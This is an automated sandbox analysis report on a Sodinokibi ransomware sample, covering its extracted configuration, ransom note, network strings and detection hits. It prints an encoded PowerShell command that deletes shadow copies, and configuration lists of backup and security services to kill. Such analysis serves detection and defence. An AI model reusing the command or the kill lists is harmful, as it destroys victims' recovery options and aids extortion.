"LQAtAC0APQA9AD0AIABXAGUAbABjAG8AbQBlAC4AIABBAGcAYQBpAG4ALgAgAD0APQA9AC0ALQAtAA0ACgANAAoAWwArAF0AIABXAGgAYQB0AHMAIABIAGEAcABwAGUAbgA/ACAAWwArAF0ADQAKAA0ACgBZAG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAsACAAYQBuAGQAIABjAHUAcgByAGUAbgB0AGwAeQAgAHUAbgBhAHYAYQBpAGwAYQBiAGwAZQAuACAAWQBvAHUAIABjAGEAbgAgAGMAaABlAGMAawAgAGkAdAA6ACAAYQBsAGwAIABmAGkAbABlAHMAIABvAG4AIAB5AG8AdQByACAAcwB5AHMAdABlAG0AIABoAGEAcwAgAGUAeAB0AGUAbgBzAGkAbwBuACAAewBFAFgAVAB9AC4ADQAKAEIAeQAgAHQAaABlACAAdwBhAHkALAAgAGUAdgBlAHIAeQB0AGgAaQBuAGcAIABpAHMAIABwAG8AcwBzAGkAYgBsAGUAIAB0AG8AIAByAGUAYwBvAHYAZQByACAAKAByAGUAcwB0AG8AcgBlACkALAAgAGIAdQB0ACAAeQBvAHUAIABuAGUAZQBkACAAdABvACAAZgBvAGwAbABvAHcAIABvAHUAcgAgAGkAbgBzAHQAcgB1AGMAdABpAG8AbgBzAC4AIABPAHQAaABlAHIAdwBpAHMAZQAsACAAeQBvAHUAIABjAGEAbgB0ACAAcgBlAHQAdQByAG4AIAB5AG8AdQByACAAZABhAHQAYQAgACgATgBFAFYARQBSACkALgANAAoADQAKAFsAKwBdACAAVwBoAGEAdAAgAGcAdQBhAHIAYQBuAHQAZQBlAHMAPwAgAFsAKwBdAA0ACgANAAoASQB0AHMAIABqAHUAcwB0ACAAYQAgAGIAdQBzAGkAbgBlAHMAcwAuACAAVwBlACAAYQBiAHMAbwBsAHUAdABlAGwAeQAgAGQAbwAgAG4AbwB0ACAAYwBhAHIAZQAgAGEAYgBvAHUAdAAgAHkAbwB1ACAAYQBuAGQAIAB5AG8AdQByACAAZABlAGEAbABzACwAIABlAHgAYwBlAHAAdAAgAGcAZQB0AHQAaQBuAGcAIABiAGUAbgBlAGYAaQB0AHMALgAgAEkAZgAgAHcAZQAgAGQAbwAgAG4AbwB0ACAAZABvACAAbwB1AHIAIAB3AG8AcgBrACAAYQBuAGQAIABsAGkAYQBiAGkAbABpAHQAaQBlAHMAIAAtACAAbgBvAGIAbwBkAHkAIAB3AGkAbABsACAAbgBvAHQAIABjAG8AbwBwAGUAcgBhAHQAZQAgAHcAaQB0AGgAIAB1AHMALgAgAEkAdABzACAAbgBvAHQAIABpAG4AIABvAHUAcgAgAGkAbgB0AGUAcgBlAHMAdABzAC4ADQAKAFQAbwAgAGMAaABlAGMAawAgAHQAaABlACAAYQBiAGkAbABpAHQAeQAgAG8AZgAgAHIAZQB0AHUAcgBuAGkAbgBnACAAZgBpAGwAZQBzACwAIABZAG8AdQAgAHMAaABvAHUAbABkACAAZwBvACAAdABvACAAbwB1AHIAIAB3AGUAYgBzAGkAdABlAC4AIABUAGgAZQByAGUAIAB5AG8AdQAgAGMAYQBuACAAZABlAGMAcgB5AHAAdAAgAG8AbgBlACAAZgBpAGwAZQAgAGYAbwByACAAZgByAGUAZQAuACAAVABoAGEAdAAgAGkAcwAgAG8AdQByACAAZwB1AGEAcgBhAG4AdABlAGUALgANAAoASQBmACAAeQBvAHUAIAB3AGkAbABsACAAbgBvAHQAIABjAG8AbwBwAGUAcgBhAHQAZQAgAHcAaQB0AGgAIABvAHUAcgAgAHMAZQByAHYAaQBjAGUAIAAtACAAZgBvAHIAIAB1AHMALAAgAGkAdABzACAAZABvAGUAcwAgAG4AbwB0ACAAbQBhAHQAdABlAHIALgAgAEIAdQB0ACAAeQBvAHUAIAB3AGkAbABsACAAbABvAHMAZQAgAHkAbwB1AHIAIAB0AGkAbQBlACAAYQBuAGQAIABkAGEAdABhACwAIABjAGEAdQBzAGUAIABqAHUAcwB0ACAAdwBlACAAaABhAHYAZQAgAHQAaABlACAAcAByAGkAdgBhAHQAZQAgAGsAZQB5AC4AIABJAG4AIABwAHIAYQBjAHQAaQBjAGUAIAAtACAAdABpAG0AZQAgAGkAcwAgAG0AdQBjAGgAIABtAG8AcgBlACAAdgBhAGwAdQBhAGIAbABlACAAdABoAGEAbgAgAG0AbwBuAGUAeQAuAA0ACgANAAoAWwArAF0AIABIAG8AdwAgAHQAbwAgAGcAZQB0ACAAYQBjAGMAZQBzAHMAIABvAG4AIAB3AGUAYgBzAGkAdABlAD8AIABbACsAXQANAAoADQAKAFkAbwB1ACAAaABhAHYAZQAgAHQAdwBvACAAdwBhAHkAcwA6AA0ACgANAAoAMQApACAAWwBSAGUAYwBvAG0AbQBlAG4AZABlAGQAXQAgAFUAcwBpAG4AZwAgAGEAIABUAE8AUgAgAGIAcgBvAHcAcwBlAHIAIQANAAoAIAAgAGEAKQAgAEQAbwB3AG4AbABvAGEAZAAgAGEAbgBkACAAaQBuAHMAdABhAGwAbAAgAFQATwBSACAAYgByAG8AdwBzAGUAcgAgAGYAcgBvAG0AIAB0AGgAaQBzACAAcwBpAHQAZQA6ACAAaAB0AHQAcABzADoALwAvAHQAbwByAHAAcgBvAGoAZQBjAHQALgBvAHIAZwAvAA0ACgAgACAAYgApACAATwBwAGUAbgAgAG8AdQByACAAdwBlAGIAcwBpAHQAZQA6ACAAaAB0AHQAcAA6AC8ALwBhAHAAbABlAGIAegB1ADQANwB3AGcAYQB6AGEAcABkAHEAawBzADYAdgByAGMAdgA2AHoAYwBuAGoAcABwAGsAYgB4AGIAcgA2AHcAawBlAHQAZgA1ADYAbgBmADYAYQBxADIAbgBtAHkAbwB5AGQALgBvAG4AaQBvAG4ALwB7AFUASQBEAH0ADQAKAA0ACgAyACkAIABJAGYAIABUAE8AUgAgAGIAbABvAGMAawBlAGQAIABpAG4AIAB5AG8AdQByACAAYwBvAHUAbgB0AHIAeQAsACAAdAByAHkAIAB0AG8AIAB1AHMAZQAgAFYAUABOACEAIABCAHUAdAAgAHkAbwB1ACAAYwBhAG4AIAB1AHMAZQAgAG8AdQByACAAcwBlAGMAbwBuAGQAYQByAHkAIAB3AGUAYgBzAGkAdABlAC4AIABGAG8AcgAgAHQAaABpAHMAOgANAAoAIAAgAGEAKQAgAE8AcABlAG4AIAB5AG8AdQByACAAYQBuAHkAIABiAHIAbwB3AHMAZQByACAAKABDAGgAcgBvAG0AZQAsACAARgBpAHIAZQBmAG8AeAAsACAATwBwAGUAcgBhACwAIABJAEUALAAgAEUAZABnAGUAKQANAAoAIAAgAGIAKQAgAE8AcABlAG4AIABvAHUAcgAgAHMAZQBjAG8AbgBkAGEAcgB5ACAAdwBlAGIAcwBpAHQAZQA6ACAAaAB0AHQAcAA6AC8ALwBkAGUAYwByAHkAcAB0AG8AcgAuAGMAYwAvAHsAVQBJAEQAfQANAAoADQAKAFcAYQByAG4AaQBuAGcAOgAgAHMAZQBjAG8AbgBkAGEAcgB5ACAAdwBlAGIAcwBpAHQAZQAgAGMAYQBuACAAYgBlACAAYgBsAG8AYwBrAGUAZAAsACAAdABoAGEAdABzACAAdwBoAHkAIABmAGkAcgBzAHQAIAB2AGEAcgBpAGEAbgB0ACAAbQB1AGMAaAAgAGIAZQB0AHQAZQByACAAYQBuAGQAIABtAG8AcgBlACAAYQB2AGEAaQBsAGEAYgBsAGUALgANAAoADQAKAFcAaABlAG4AIAB5AG8AdQAgAG8AcABlAG4AIABvAHUAcgAgAHcAZQBiAHMAaQB0AGUALAAgAHAAdQB0ACAAdABoAGUAIABmAG8AbABsAG8AdwBpAG4AZwAgAGQAYQB0AGEAIABpAG4AIAB0AGgAZQAgAGkAbgBwAHUAdAAgAGYAbwByAG0AOgANAAoASwBlAHkAOgANAAoADQAKAA0ACgB7AEsARQBZAH0ADQAKAA0ACgANAAoALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAA0ACgANAAoAIQAhACEAIABEAEEATgBHAEUAUgAgACEAIQAhAA0ACgBEAE8ATgBUACAAdAByAHkAIAB0AG8AIABjAGgAYQBuAGcAZQAgAGYAaQBsAGUAcwAgAGIAeQAgAHkAbwB1AHIAcwBlAGwAZgAsACAARABPAE4AVAAgAHUAcwBlACAAYQBuAHkAIAB0AGgAaQByAGQAIABwAGEAcgB0AHkAIABzAG8AZgB0AHcAYQByAGUAIABmAG8AcgAgAHIAZQBzAHQAbwByAGkAbgBnACAAeQBvAHUAcgAgAGQAYQB0AGEAIABvAHIAIABhAG4AdABpAHYAaQByAHUAcwAgAHMAbwBsAHUAdABpAG8AbgBzACAALQAgAGkAdABzACAAbQBhAHkAIABlAG4AdABhAGkAbAAgAGQAYQBtAGEAZwBlACAAbwBmACAAdABoAGUAIABwAHIAaQB2AGEAdABlACAAawBlAHkAIABhAG4AZAAsACAAYQBzACAAcgBlAHMAdQBsAHQALAAgAFQAaABlACAATABvAHMAcwAgAGEAbABsACAAZABhAHQAYQAuAA0ACgAhACEAIQAgACEAIQAhACAAIQAhACEADQAKAE8ATgBFACAATQBPAFIARQAgAFQASQBNAEUAOgAgAEkAdABzACAAaQBuACAAeQBvAHUAcgAgAGkAbgB0AGUAcgBlAHMAdABzACAAdABvACAAZwBlAHQAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYgBhAGMAawAuACAARgByAG8AbQAgAG8AdQByACAAcwBpAGQAZQAsACAAdwBlACAAKAB0AGgAZQAgAGIAZQBzAHQAIABzAHAAZQBjAGkAYQBsAGkAcwB0AHMAKQAgAG0AYQBrAGUAIABlAHYAZQByAHkAdABoAGkAbgBnACAAZgBvAHIAIAByAGUAcwB0AG8AcgBpAG4AZwAsACAAYgB1AHQAIABwAGwAZQBhAHMAZQAgAHMAaABvAHUAbABkACAAbgBvAHQAIABpAG4AdABlAHIAZgBlAHIAZQAuAA0ACgAhACEAIQAgACEAIQAhACAAIQAhACEAAAA=", "et": 0, "wipe": true, "wfld": ["back", "backups", "archive", "backup", "archive backup", "bckp"], "nname": "{EXT}-readme.txt", "pk": "f9FWZTEp+jwBhcV+AN1uSctgSHhfUcqwxi7aFcnHK2E=", "net": false, "exp": false, "arn": false}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.782683038.0000000002E1F000.00000004.00000040.sdmpJoeSecurity_SodinokibiYara detected Sodinokibi RansomwareJoe Security
    00000000.00000003.782448934.0000000002E1F000.00000004.00000040.sdmpJoeSecurity_SodinokibiYara detected Sodinokibi RansomwareJoe Security
      Process Memory Space: HAjXCphNj5.exe PID: 3876JoeSecurity_SodinokibiYara detected Sodinokibi RansomwareJoe Security

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: Delete Shadow Copy Via PowershellShow sources
        Source: Process startedAuthor: Joe Security: Data: Command: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==, CommandLine: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\HAjXCphNj5.exe' , ParentImage: C:\Users\user\Desktop\HAjXCphNj5.exe, ParentProcessId: 3876, ProcessCommandLine: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==, ProcessId: 6028

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: HAjXCphNj5.exe.3876.0.memstrMalware Configuration Extractor: Sodinokibi {"prc": ["infopath", "onenote", "msaccess", "sqbcoreservice", "ocautoupds", "dbeng50", "bedbh", "powerpnt", "excel", "isqlplussvc", "tbirdconfig", "wordpad", "VeeamTransportSvc", "thebat", "CagService", "raw_agent_svc", "oracle", "visio", "encsvc", "ocomm", "pvlsvr", "outlook", "dbsnmp", "VeeamNFSSvc", "EnterpriseClient", "xfssvccon", "vxmon", "beserver", "mydesktopqos", "DellSystemDetect", "mspub", "firefox", "agntsvc", "vsnapvss", "sql", "VeeamDeploymentSvc", "synctime", "benetns", "ocssd", "bengien", "winword", "mydesktopservice", "thunderbird", "steam"], "sub": "4933", "svc": ["AcrSch2Svc", "VSNAPVSS", "svc$", "AcronisAgent", "VeeamTransportSvc", "MSExchange", "sql", "WSBExchange", "BackupExecAgentAccelerator", "BackupExecDiveciMediaService", "vss", "MVarmor64", "bedbg", "backup", "CAARCUpdateSvc", "PDVFSService", "MSSQL$", "stc_raw_agent", "BackupExecJobEngine", "MSExchange$", "BackupExecVSSProvider", "BackupExecRPCService", "mepocs", "MSSQL", "ARSM", "BackupExecAgentBrowser", "memtas", "BackupExecManagementService", "sophos", "veeam", "CASAD2DWebSvc", "MVArmor", "VeeamNFSSvc", "VeeamDeploymentService"], "wht": {"ext": ["theme", "deskthemepack", "icns", "cmd", "msi", "dll", "386", "com", "ics", "spl", "icl", "ico", "diagpkg", "key", "ldf", "ani", "prf", "drv", "bat", "msc", "lock", "rom", "cab", "msstyles", "sys", "rtp", "cpl", "adv", "bin", "hlp", "idx", "ocx", "wpx", "mpa", "shs", "diagcfg", "msu", "diagcab", "nls", "mod", "cur", "exe", "themepack", "ps1", "scr", "nomedia", "msp", "hta", "lnk"], "fls": ["desktop.ini", "boot.ini", "ntuser.dat", "ntldr", "ntuser.ini", "iconcache.db", "thumbs.db", "bootsect.bak", "ntuser.dat.log", "bootfont.bin", "autorun.inf"], "fld": ["$windows.~bt", "google", "msocache", "tor browser", "program files", "windows.old", "appdata", "boot", "intel", "$recycle.bin", "perflogs", "programdata", "program files (x86)", "application data", "mozilla", "system volume information", "$windows.~ws"]}, "img": "QQBsAGwAIABvAGYAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAhAA0ACgANAAoARgBpAG4AZAAgAHsARQBYAFQAfQAtAHIAZQBhAGQAbQBlAC4AdAB4AHQAIABhAG4AZAAgAGYAbwBsAGwAbwB3ACAAaQBuAHMAdAB1AGMAdABpAG8AbgBzAAAA", "dmn": "galleryartfair.com;myhealth.net.au;sandd.nl;devstyle.org;abogadosadomicilio.es;socstrp.org;huesges-gruppe.de;tastewilliamsburg.com;mousepad-direkt.de;drugdevice.org;fannmedias.com;haar-spange.com;n1-headache.com;thomasvicino.com;mrtour.site;marketingsulweb.com;abl1.net;adoptioperheet.fi;zflas.com;asgestion.com;corola.es;denovofoodsgroup.com;cyntox.com;tomoiyuma.com;cortec-neuro.com;hebkft.hu;labobit.it;groupe-frayssinet.fr;paradicepacks.com;coastalbridgeadvisors.com;bimnapratica.com;oneplusresource.org;launchhubl.com;zervicethai.co.th;oneheartwarriors.at;balticdermatology.lt;edelman.jp;lefumetdesdombes.com;agence-chocolat-noir.com;koko-nora.dk;kaliber.co.jp;profectis.de;zenderthelender.com;maureenbreezedancetheater.org;bloggyboulga.net;mooshine.com;hiddencitysecrets.com.au;kmbshippin
        Multi AV Scanner detection for submitted fileShow sources
        Source: HAjXCphNj5.exeVirustotal: Detection: 48%Perma Link
        Source: HAjXCphNj5.exeReversingLabs: Detection: 39%
        Machine Learning detection for sampleShow sources
        Source: HAjXCphNj5.exeJoe Sandbox ML: detected
        Source: 0.3.HAjXCphNj5.exe.d50000.0.unpackAvira: Label: TR/Patched.Ren.Gen
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_00405086 CryptAcquireContextW,CryptGenRandom,0_2_00405086
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_0040596C CryptStringToBinaryW,CryptStringToBinaryW,0_2_0040596C
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_004059CD CryptBinaryToStringW,CryptBinaryToStringW,0_2_004059CD
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_001C5C1D CryptBinaryToStringW,CryptBinaryToStringW,0_2_001C5C1D
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_001C52D6 CryptAcquireContextW,CryptGenRandom,0_2_001C52D6
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_001C5BBC CryptStringToBinaryW,CryptStringToBinaryW,0_2_001C5BBC
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile opened: z:Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile opened: x:Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile opened: v:Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile opened: t:Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile opened: r:Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile opened: p:Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile opened: n:Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile opened: l:Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile opened: j:Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile opened: h:Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile opened: f:Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile opened: d:Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile opened: b:Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile opened: y:Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile opened: w:Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile opened: u:Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile opened: s:Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile opened: q:Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile opened: o:Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile opened: m:Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile opened: k:Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile opened: i:Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile opened: g:Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile opened: e:Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: c:Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile opened: a:Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_004070C1 FindFirstFileExW,FindFirstFileW,FindNextFileW,FindClose,0_2_004070C1
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_001C7311 FindFirstFileExW,FindFirstFileW,FindNextFileW,FindClose,0_2_001C7311

        Networking:

        barindex
        Found Tor onion addressShow sources
        Source: HAjXCphNj5.exe, 00000000.00000003.782590176.0000000002E2C000.00000004.00000040.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}
        Source: HAjXCphNj5.exe, 00000000.00000002.1223484720.0000000002E28000.00000004.00000040.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/AC36CB5436CFD579
        Source: 9f8ugt-readme.txt30.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/AC36CB5436CFD579
        Source: HAjXCphNj5.exe, 00000000.00000003.782590176.0000000002E2C000.00000004.00000040.sdmpString found in binary or memory: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/
        Source: HAjXCphNj5.exe, 00000000.00000002.1223484720.0000000002E28000.00000004.00000040.sdmp, 9f8ugt-readme.txt30.0.drString found in binary or memory: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/AC36CB5436CFD579
        Source: HAjXCphNj5.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
        Source: HAjXCphNj5.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
        Source: HAjXCphNj5.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
        Source: HAjXCphNj5.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
        Source: HAjXCphNj5.exeString found in binary or memory: http://crl.thawte.com/ThawtePCA.crl0
        Source: HAjXCphNj5.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
        Source: HAjXCphNj5.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
        Source: HAjXCphNj5.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
        Source: HAjXCphNj5.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
        Source: HAjXCphNj5.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
        Source: HAjXCphNj5.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
        Source: HAjXCphNj5.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
        Source: HAjXCphNj5.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
        Source: HAjXCphNj5.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
        Source: HAjXCphNj5.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
        Source: HAjXCphNj5.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
        Source: HAjXCphNj5.exe, 00000000.00000003.782590176.0000000002E2C000.00000004.00000040.sdmpString found in binary or memory: http://decryptor.cc/
        Source: HAjXCphNj5.exe, 00000000.00000002.1223484720.0000000002E28000.00000004.00000040.sdmp, 9f8ugt-readme.txt30.0.drString found in binary or memory: http://decryptor.cc/AC36CB5436CFD579
        Source: HAjXCphNj5.exeString found in binary or memory: http://ocsp.digicert.com0A
        Source: HAjXCphNj5.exeString found in binary or memory: http://ocsp.digicert.com0C
        Source: HAjXCphNj5.exeString found in binary or memory: http://ocsp.digicert.com0N
        Source: HAjXCphNj5.exeString found in binary or memory: http://ocsp.digicert.com0O
        Source: HAjXCphNj5.exeString found in binary or memory: http://ocsp.thawte.com0
        Source: HAjXCphNj5.exeString found in binary or memory: http://th.symcb.com/th.crl0
        Source: HAjXCphNj5.exeString found in binary or memory: http://th.symcb.com/th.crt0
        Source: HAjXCphNj5.exeString found in binary or memory: http://th.symcd.com0&
        Source: HAjXCphNj5.exeString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
        Source: HAjXCphNj5.exe, 00000000.00000003.782590176.0000000002E2C000.00000004.00000040.sdmp, 9f8ugt-readme.txt30.0.drString found in binary or memory: https://torproject.org/
        Source: HAjXCphNj5.exeString found in binary or memory: https://www.digicert.com/CPS0
        Source: HAjXCphNj5.exeString found in binary or memory: https://www.thawte.com/cps0/
        Source: HAjXCphNj5.exeString found in binary or memory: https://www.thawte.com/repository0W

        Spam, unwanted Advertisements and Ransom Demands:

        barindex
        Found ransom note / readmeShow sources
        Source: C:\9f8ugt-readme.txtDropped file: ---=== Welcome. Again. ===---[+] Whats Happen? [+]Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 9f8ugt.By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).[+] What guarantees? [+]Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.[+] How to get access on website? [+]You have two ways:1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/AC36CB5436CFD5792) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/AC36CB5436CFD579Warning: secondary website can be blocked, thats why first variant much beJump to dropped file
        Yara detected Sodinokibi RansomwareShow sources
        Source: Yara matchFile source: 00000000.00000003.782683038.0000000002E1F000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.782448934.0000000002E1F000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: HAjXCphNj5.exe PID: 3876, type: MEMORY
        Contains functionalty to change the wallpaperShow sources
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_0040419B GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetDeviceCaps,MulDiv,CreateFontW,SelectObject,SetBkMode,SetTextColor,GetStockObject,FillRect,SetPixel,DrawTextW,SystemParametersInfoW,DeleteObject,DeleteObject,DeleteDC,ReleaseDC,0_2_0040419B
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_001C43EB GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetDeviceCaps,MulDiv,CreateFontW,SelectObject,SetBkMode,SetTextColor,GetStockObject,FillRect,SetPixel,DrawTextW,SystemParametersInfoW,DeleteObject,DeleteObject,DeleteDC,ReleaseDC,0_2_001C43EB
        Modifies existing user documents (likely ransomware behavior)Show sources
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile moved: C:\Users\user\Desktop\ZTGJILHXQB\ZTGJILHXQB.docxJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile deleted: C:\Users\user\Desktop\ZTGJILHXQB\ZTGJILHXQB.docxJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile moved: C:\Users\user\Desktop\WKXEWIOTXI\ZTGJILHXQB.xlsxJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile deleted: C:\Users\user\Desktop\WKXEWIOTXI\ZTGJILHXQB.xlsxJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile moved: C:\Users\user\Desktop\IPKGELNTQY.xlsxJump to behavior

        System Summary:

        barindex
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_00403839 OpenSCManagerW,EnumServicesStatusExW,RtlGetLastWin32Error,CloseServiceHandle,CloseServiceHandle,EnumServicesStatusExW,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,CloseServiceHandle,0_2_00403839
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_0040B1B10_2_0040B1B1
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_004085070_2_00408507
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_0040A51C0_2_0040A51C
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_00407FE40_2_00407FE4
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_00407D860_2_00407D86
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_001C82340_2_001C8234
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_001CA76C0_2_001CA76C
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_001C7FD60_2_001C7FD6
        Source: HAjXCphNj5.exeStatic PE information: invalid certificate
        Source: HAjXCphNj5.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: HAjXCphNj5.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: HAjXCphNj5.exe, 00000000.00000002.1223906621.0000000003F00000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs HAjXCphNj5.exe
